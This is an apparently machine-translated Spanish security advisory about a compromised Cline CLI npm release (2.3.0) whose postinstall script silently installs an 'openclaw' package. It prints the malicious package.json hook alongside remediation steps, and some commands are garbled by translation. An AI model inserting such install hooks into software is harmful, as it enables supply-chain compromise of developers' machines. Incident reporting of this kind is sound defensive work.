Hackers comprometidosNPM de Cline CLIpublicar el token el 17 de febrero de 2026, de 3:26 a. m. PT a 11:30 a. m. PT. Lanzaron la versión maliciosa 2.3.0 que instaló OpenCLAW mediante un script posterior a la instalación. Los desarrolladores que instalaron durante este período enfrentan un riesgo potencial en la cadena de suministro.
Cline sirve como asistente de codificación de IA para VS Code y JetBrains. Los atacantes solo modificaron el paquete.json y dejaron intactos los archivos principales. Esto conservó la funcionalidad del paquete al tiempo que inyectaba dependencia no autorizada.
equipo de clineDetectó un compromiso, lanzó Clean 2.4.0 y dejó de usar 2.3.0. Revocaron el token robado y cambiaron a la procedencia OIDC a través de GitHub Actions.
Cronología del ataque
3:26 a. m. (hora del Pacífico): malicioso[correo electrónico protegido]publicado
11:23 a. m. (hora del Pacífico): Limpio[correo electrónico protegido]liberado (8 horas después)
11:30 a. m. hora del Pacífico: 2.3.0 obsoleto del registro npm
Comportamiento comprometido: instalación npm -g[correo electrónico protegido]
Se ejecuta silenciosamente: npm install -g openclaw@latest
OpenCLAW parece legítimo pero representa una inserción no autorizada en la cadena de suministro.
Detalles técnicos
Los atacantes apuntaron específicamente al token de publicación. No se ejecuta código más allá de la instalación de npm. La extensión VS Code y el complemento JetBrains no se ven afectados.
Fragmento malicioso de package.json:{
“guiones”: {
“postinstall”: “npm install -g openclaw@latest”
}
}
El binario principal de CLI (dist/cli.mjs) permaneció idéntico a 2.2.3.
Para desarrolladores afectados:
#Actualizar inmediatamente
instalación npm -g cline@latest
cline –versión # Verificar 2.4.0+
#Retirar paquete inyectado
desinstalación npm -g openclaw
#Verificar que no haya persistencia
lista npm -g –profundidad=0 | grep garra abierta
Verificar ventana de instalación: Consulte los registros de instalación de npm del 17 de febrero de 3:26 a 11:30 a. m., hora del Pacífico.
Evaluación de riesgos de la cadena de suministro
| Vector de riesgo | Estado | Mitigación |
|---|---|---|
| Ejecución de código | Ninguno | La postinstalación solo instala el paquete |
| Persistencia | Paquete OpenCLAW npm | Desinstalación manual |
| Movimiento lateral | Ninguno detectado | Cadena de dependencia limpia |
| Impacto del registro | En desuso | npm impide la reinstalación |
Legitimación de OpenCLAW no verificada. Trátelo como potencialmente malicioso hasta que sea auditado.
Medidas de prevención implementadas
Respuesta de Cline:
- Token npm robado revocado
- La publicación se migró a OIDC + GitHub Actions
- 2FA aplicado en todas las cuentas
- Auditoría de canal de lanzamiento completada
Implicaciones más amplias:
- Los tokens de publicación de npm representan un único punto de falla
- OIDC elimina los riesgos de tokens estáticos
- La verificación de dependencia se vuelve crítica
Impacto en el ecosistema del desarrollador
exposición inmediata: Desarrolladores instalando[correo electrónico protegido]durante la ventana de 8 horas
Vectores potenciales: Espejos de npm corporativos, canalizaciones de CI/CD
Verificación necesaria: Todos los entornos que utilizan Cline CLI
Mejores prácticas de npm después del incidente
Multifactor: aplique 2FA en todas las cuentas del paquete
Higiene de los tokens: rotar los tokens de publicación trimestralmente
Adopción de OIDC: eliminar las credenciales estáticas
Verificación de versión: verifique package.json antes de instalar
Herramientas de auditoría: Dependabot, Socket, auditoría npm
Preguntas frecuentes
¿Cuándo se produjo el compromiso de Cline?
17 de febrero de 2026, de 3:26 a. m. PT a 11:30 a. m. PT (8 horas).
¿Qué acción maliciosa se tomó?
El script de postinstalación instaló el paquete openclaw@latest.
¿Se vieron afectadas las extensiones de VS Code/JetBrains?
No. Sólo el paquete CLI npm está comprometido.
¿Cómo verificar una instalación limpia?
cline --versionmuestra 2.4.0+.npm uninstall -g openclaw.
¿Qué mitigación se implementó?
Token revocado. La publicación ahora usa OIDC a través de GitHub Actions.
¿OpenCLAW debería ser tratado como malicioso?
Legitimación desconocida. Retirar inmediatamente independientemente.